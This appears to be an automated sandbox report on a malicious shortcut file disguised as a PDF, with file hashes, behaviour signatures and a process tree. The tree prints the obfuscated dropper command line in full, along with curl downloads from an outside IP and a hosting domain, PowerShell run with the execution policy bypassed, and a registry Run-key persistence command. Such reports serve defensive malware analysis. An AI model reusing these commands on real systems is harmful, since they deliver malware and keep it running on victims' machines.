Analysis
- max time kernel: 143s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 10/11/2024, 22:06

Static task: static1

Behavioral task: behavioral1
- Sample: transaction.pdf.lnk
- Resource: win7-20240903-en

Behavioral task: behavioral2
- Sample: transaction.pdf.lnk
- Resource: win10v2004-20241007-en
General
- Target: transaction.pdf.lnk
- Size: 3KB
- MD5: 0a2f22c7a16adfe8fbfa67b77edc82b4
- SHA1: c2556809eee64ec4061a50d4ea2ee41d6781371f
- SHA256: d1dcb2be1a582a5bc503bac9b906f54a4fa7fd2d17b0fa5156b936c7f8acc7bb
- SHA512: 002bb80565514e02834f182f029f5eb0593d22e915aeb6014cf650ef38b93f0a5b8849e7dd766b4099d96025c083b7a0e6790f815e7eec14a5ee2d44ad4dfeac
Malware Config
Signatures
- Blocklisted process makes network request (2 IoCs)
  flow  pid   Process
  26    2376  cscript.exe
  46    2376  cscript.exe

- Checks computer location settings (2 TTPs, 5 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                  Process
  Key value queried  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation  cscript.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation  wscript.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation  wscript.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation  wscript.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation  cmd.exe

- Executes dropped EXE (1 IoC)
  pid   Process
  4088  ApplicationFrameHost.exe

- Loads dropped DLL (1 IoC)
  pid   Process
  4088  ApplicationFrameHost.exe

- Adds Run key to start application (2 TTPs, 1 IoC)
  description      ioc                                                                                                                        Process
  Set value (str)  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdate = "wscript.exe C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\merge.ps1 KBKWGEBK"  reg.exe

- Command and Scripting Interpreter: JavaScript (1 TTP)

  pid   Process
  4816  powershell.exe
  2192  powershell.exe

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

- Suspicious behavior: EnumeratesProcesses (7 IoCs)
  pid   Process
  2192  powershell.exe
  2192  powershell.exe
  4816  powershell.exe
  4816  powershell.exe
  4816  powershell.exe
  4816  powershell.exe
  4816  powershell.exe

- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2192  powershell.exe
  Token: SeDebugPrivilege  4816  powershell.exe

- Suspicious use of WriteProcessMemory (32 IoCs)
  description                       pid   Process                   procid_target
  PID 4916 wrote to memory of 4388  4916  cmd.exe                   84
  PID 4916 wrote to memory of 4388  4916  cmd.exe                   84
  PID 4388 wrote to memory of 4616  4388  cmd.exe                   85
  PID 4388 wrote to memory of 4616  4388  cmd.exe                   85
  PID 4616 wrote to memory of 3160  4616  cscript.exe               87
  PID 4616 wrote to memory of 3160  4616  cscript.exe               87
  PID 3160 wrote to memory of 5096  3160  cmd.exe                   89
  PID 3160 wrote to memory of 5096  3160  cmd.exe                   89
  PID 3160 wrote to memory of 1748  3160  cmd.exe                   98
  PID 3160 wrote to memory of 1748  3160  cmd.exe                   98
  PID 3160 wrote to memory of 2192  3160  cmd.exe                   105
  PID 3160 wrote to memory of 2192  3160  cmd.exe                   105
  PID 3160 wrote to memory of 4088  3160  cmd.exe                   106
  PID 3160 wrote to memory of 4088  3160  cmd.exe                   106
  PID 4088 wrote to memory of 2772  4088  ApplicationFrameHost.exe  107
  PID 4088 wrote to memory of 2772  4088  ApplicationFrameHost.exe  107
  PID 2772 wrote to memory of 4264  2772  wscript.exe               108
  PID 2772 wrote to memory of 4264  2772  wscript.exe               108
  PID 4264 wrote to memory of 3248  4264  cmd.exe                   110
  PID 4264 wrote to memory of 3248  4264  cmd.exe                   110
  PID 3248 wrote to memory of 4932  3248  wscript.exe               111
  PID 3248 wrote to memory of 4932  3248  wscript.exe               111
  PID 4932 wrote to memory of 4816  4932  cmd.exe                   113
  PID 4932 wrote to memory of 4816  4932  cmd.exe                   113
  PID 4816 wrote to memory of 2376  4816  powershell.exe            114
  PID 4816 wrote to memory of 2376  4816  powershell.exe            114
  PID 4264 wrote to memory of 3616  4264  cmd.exe                   115
  PID 4264 wrote to memory of 3616  4264  cmd.exe                   115
  PID 3616 wrote to memory of 2328  3616  wscript.exe               116
  PID 3616 wrote to memory of 2328  3616  wscript.exe               116
  PID 2328 wrote to memory of 4500  2328  cmd.exe                   118
  PID 2328 wrote to memory of 4500  2328  cmd.exe                   118
Processes
(bracketed number = depth in the process tree; each entry lists the image path, the command line, the PID and the signatures that fired on it)

- [1] C:\Windows\system32\cmd.exe
  command: cmd /c C:\Users\Admin\AppData\Local\Temp\transaction.pdf.lnk
  PID: 4916
  signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\cmd.exe
    command: "C:\Windows\System32\cmd.exe" /v /c "set "JWU1=e"&&set "RnK2=n"&&set "nKM3=c"&&set "fHp4=r"&&set "uwq5=y"&&set "IIX6=p"&&set "Pfo7=t"&&set "Umz8=i"&&set "FwH9=o"&&set "Nix10=n"&&set "unu11=k"&&set "Mbr12=e"&&set "mNc13=y"&@echo off & (for %t in ("@!Mbr12!!nKM3!h!FwH9! !FwH9!ff" "!nKM3!u!fHp4!l -!FwH9! C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g h!Pfo7!!Pfo7!!IIX6!s://d!fHp4!!Umz8!v!Mbr12!.f!Umz8!l!Mbr12!!Umz8!!FwH9!.!nKM3!!Mbr12!!Nix10!!Pfo7!!Mbr12!!fHp4!/bas!Mbr12!1.j!IIX6!g" "C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g" "!nKM3!u!fHp4!l -L -!FwH9! C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6! h!Pfo7!!Pfo7!!IIX6!://170.75.168.151/KBKWGEBK/aaa" "!IIX6!!FwH9!w!Mbr12!!fHp4!sh!Mbr12!ll -C!FwH9!mma!Nix10!d Ex!IIX6!a!Nix10!d-A!fHp4!!nKM3!h!Umz8!v!Mbr12! -Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6!' -D!Mbr12!s!Pfo7!!Umz8!!Nix10!a!Pfo7!!Umz8!!FwH9!!Nix10!Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp' -F!FwH9!!fHp4!!nKM3!!Mbr12!" "s!Pfo7!a!fHp4!!Pfo7! C:\Users\Admin\AppData\Local\Temp\A!IIX6!!IIX6!l!Umz8!!nKM3!a!Pfo7!!Umz8!!FwH9!!Nix10!F!fHp4!am!Mbr12!H!FwH9!s!Pfo7!.!Mbr12!x!Mbr12!") do echo %~t) > "C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7!" && !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7! ba!Pfo7!2.ba!Pfo7! & !Mbr12!!nKM3!h!FwH9! S!Mbr12!!Pfo7! !FwH9!bjSh!Mbr12!ll = C!fHp4!!Mbr12!a!Pfo7!!Mbr12!Obj!Mbr12!!nKM3!!Pfo7!("WS!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7!.Sh!Mbr12!ll") : !FwH9!bjSh!Mbr12!ll.Ru!Nix10! "!nKM3!md.!Mbr12!x!Mbr12! /c C:\Users\Admin\AppData\Local\Temp\ba!Pfo7!2.ba!Pfo7!", 0, False > "C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7!" & !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7! !fHp4!u!Nix10!_ba!Pfo7!.vbs & s!Pfo7!a!fHp4!!Pfo7! "" !nKM3!s!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7! //!Nix10!!FwH9!l!FwH9!g!FwH9! "C:\Users\Admin\AppData\Local\Temp\!fHp4!u!Nix10!_ba!Pfo7!.vbs""
    PID: 4388
    signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\cscript.exe
      command: cscript //nologo "C:\Users\Admin\AppData\Local\Temp\run_bat.vbs"
      PID: 4616
      signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
      - [4] C:\Windows\System32\cmd.exe
        command: "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\bat2.bat
        PID: 3160
        signatures: Suspicious use of WriteProcessMemory
        - [5] C:\Windows\System32\curl.exe
          command: curl -o C:\Users\Admin\AppData\Local\Temp\test.jpg https://drive.fileio.center/base1.jpg
          PID: 5096
        - [5] C:\Windows\System32\curl.exe
          command: curl -L -o C:\Users\Admin\AppData\Local\Temp\base.zip http://170.75.168.151/KBKWGEBK/aaa
          PID: 1748
        - [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          command: powershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\base.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp' -Force
          PID: 2192
          signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
        - [5] C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe
          command: C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe
          PID: 4088
          signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
          - [6] C:\Windows\System32\wscript.exe
            command: wscript.exe "C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs" wscript.exe "C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1" KBKWGEBK & wscript.exe "C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs" reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f"
            PID: 2772
            signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
            - [7] C:\Windows\System32\cmd.exe
              command: "C:\Windows\System32\cmd.exe" /c wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK & wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f
              PID: 4264
              signatures: Suspicious use of WriteProcessMemory
              - [8] C:\Windows\System32\wscript.exe
                command: wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK
                PID: 3248
                signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
                - [9] C:\Windows\System32\cmd.exe
                  command: "C:\Windows\System32\cmd.exe" /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK
                  PID: 4932
                  signatures: Suspicious use of WriteProcessMemory
                  - [10] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    command: powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK
                    PID: 4816
                    signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
                    - [11] C:\Windows\system32\cscript.exe
                      command: "C:\Windows\system32\cscript.exe" //nologo "C:\Users\Admin\AppData\Local\Microsoft\hello.js" KBKWGEBK
                      PID: 2376
                      signatures: Blocklisted process makes network request
              - [8] C:\Windows\System32\wscript.exe
                command: wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f
                PID: 3616
                signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
                - [9] C:\Windows\System32\cmd.exe
                  command: "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f
                  PID: 2328
                  signatures: Suspicious use of WriteProcessMemory
                  - [10] C:\Windows\System32\reg.exe
                    command: reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f
                    PID: 4500
                    signatures: Adds Run key to start application
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 3KB
  MD5: fe3aab3ae544a134b68e881b82b70169
  SHA1: 926e9b4e527ae1bd9b3b25726e1f59d5a34d36a6
  SHA256: bda499e3f69d8fe0227e734bbb935dc5bf0050d37adf03bc41356dfcb5bcca0b
  SHA512: 3fbd3499d98280b6c79c67b0ee183b27692dbc31acf103b4f8ca4dcdf392afff2b3aad500037f4288581ed37e85f45c3bbb5dcde11cddf3ef0609f44b2ecb280

- Filesize: 1KB
  MD5: c0e79e67a9a209d37c9e3a9dd6437ab0
  SHA1: ce94d8bb54f007e7536727606f8120688da83cd4
  SHA256: 7f07c943fdbd9ac658066c962b71b3d1f6f8b5d010b1c776c3eea7f3f737e0b0
  SHA512: 0fff8b276c0efb570e0bcc414c376a27efa2edefab1a0afb7e470a73fd4c47b57846454c145105f935d9e12b4fa50d297e54ea29b09010ccb3ed9d7d1148269d

- Filesize: 7KB
  MD5: d3764fea6416c62582aae6f79759c2be
  SHA1: ffba6fe6ae16d9f1c191d462463a5aeec79eb5c7
  SHA256: 0528254a5933622320e8a3aafdcf4d6e0c3a5b49bac2ff49a7c8b61ecd51b3b0
  SHA512: 0da696218c879cda5917e3c81e050b62c83c0611d7825df36c3f971e4da63ecdfc66cc76338c00dbeec6de6c675004eaf2e9a7521580f932cbbc2838de2ceeac

- Filesize: 1KB
  MD5: 2c4ffae6bfebb1ee0035e1400034265d
  SHA1: 1f93c5cb3953f4a5927ab97eb1618f2c08c448a1
  SHA256: 2fb855f25db72aebe25885ddd1c983b8769944ede510cc658c7d1c6bdd5787c3
  SHA512: 860b4c29d06df1f07258f2b9ae7be5c9830d1bd7aa7ab827c823a6bc961739b6c358b8d5f1efe1b0df00eb398192a2f7495e14b19deafb535450ed72d1472aae

- Filesize: 1KB
  MD5: fc8b6f161d4f96d3d299400aa78914b7
  SHA1: dbe374b617e289f945608254583fc405489f68a5
  SHA256: bc995c4123c50cd55c83bf1d17815740aea9930863f82eb62936cc598769e46f
  SHA512: 00b76152598a52ec391484969828084ead6f56092c26b47d583b10618caffc930e52b9ea48d9c631cd733f85acad32434434b985719f09580f2eb87731198c9c

- Filesize: 1KB
  MD5: 4c5b654dd985cb1757a4aa84545dc994
  SHA1: 0266eecac74bbb118780201100bcb8ec8aceef3c
  SHA256: 7639b5d13dcb7090099326b883095771a63cfb7ff0315dbd78ba6060e4ff7e99
  SHA512: 93615577bbccfc5d5328b016dfc5437bdbe19b354b245f760ded06b4165819ab8702de3876ae34b2d21376bdeab92ba6b74632c8a27038be06205417c068ecc0

- Filesize: 78KB
  MD5: db2fefe19f85e618f62686cf453df33c
  SHA1: 9a37897fb3e75074d451c87e5b3dd602545648a6
  SHA256: 67077124e4a881dba9e4c6e65c8bb45d5ab14a429959f935f933f5824596e463
  SHA512: e4fb7dadd3ee954c0b46a95521a42cc076f77d75e9f3ce0ab68713a096b7a45b145723c27bb7d420c5cd5489d69867dc31175135a7efe397deab7bec43eab9c2

- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

- Filesize: 634KB
  MD5: 367a5951e81795113b8564546a8346c5
  SHA1: f5dede6905ce2f0ca23a8f29052c6cbfc66da404
  SHA256: 4cf4e56b88e42327d3e0dfc48b99c05058df7f46d03dd08ed3295bb6b932ea77
  SHA512: 061a0d8e9f3f06d036237091f06c92794156ca253004b82b4ecaa89d48052ae120ea9134fd3532911997e4c038ab7a932fc601d75ea86a7309fb0e255e13f488

- Filesize: 448B
  MD5: aa350b1db128975bd16e8c2c7c4df7f1
  SHA1: 7be6d97138179f8676740a4e0cbb660736183397
  SHA256: 69d90278d0a0a757b0cc5fc04459d508edbd7e4a8eba6ae66a5fe84ca12af017
  SHA512: 65e523b8a29ac68fd9b2e3afe8825b7506335050769cd39dffb1deb11454b67515fa3cd0a96eb54016540dd2e0dbed87dbbfb6f4ed1f283289f04168108571f6

- Filesize: 2.4MB
  MD5: 83ce934c9273a1daf846ccd0186e1497
  SHA1: 4439cd1642e8af4f4b6f709bd69ea6afabb62d80
  SHA256: bff92ebb960e6b5de169fe56e6ebd3862f7b0563ab38687c51d0e09d1bffc819
  SHA512: c2a6e76f8ce3e6d6378a4becf59b441eeec3b0e4d18e20153a61d6757f10d33425801a3b899527e142bc53307cab26d56fcb0a8472485430e5802dbc7faeec0f

- Filesize: 129B
  MD5: 88c7a65cabaeae2e10cbc7bd5608b28b
  SHA1: d6ee96710a99d0f65a867c6082148ae7a4981227
  SHA256: 250bba449b1002c473327e0f2450753fe07f42ad4ffac8a8dc2f367cb416b543
  SHA512: b78af497df0dc713822859cb72c58415c0974c43bdd2bad4d4ebdcfc307bbf1f4178452bb7816e28b1a5b3b3f5152a0fbafcd6dc4568d99e9e3fc20ff28a3340

- Filesize: 6KB
  MD5: f230b7afc89267a9766f3406cb5dbddf
  SHA1: 06797eb37d26eb18757db1daff2d381ab25566ab
  SHA256: aa27582360eb94b77b942235e6fd1ea5d98fa73f447b8bdba818fcf5a40d09a4
  SHA512: c2cc1ecd7a70d73fd6f6471a7bf6e45dd11b0698d6beaf65922550489f40233de1a5ddd2a572dff2eb17a1b767ac53f105f0e2e6bad26ccc8193973e914a949a

- Filesize: 604B
  MD5: 66837cd467d2e7fb879f7f8a8a7c32c9
  SHA1: 70367364b2a4ccf95dc39edb3df96cb0bddbce5b
  SHA256: 7904f5905e21ddb8ee0bcaa03e009683b0e5995d7b3b64a5d8fac3cea434eaf5
  SHA512: 8ed864277d19143bd9f073f56eff6720d882cdf7022e1ff996f17d4cb256ed59fee13fd0fe6bdce6c0a26bd45a322142d38fc473d3a6456bc9c211f709baf05a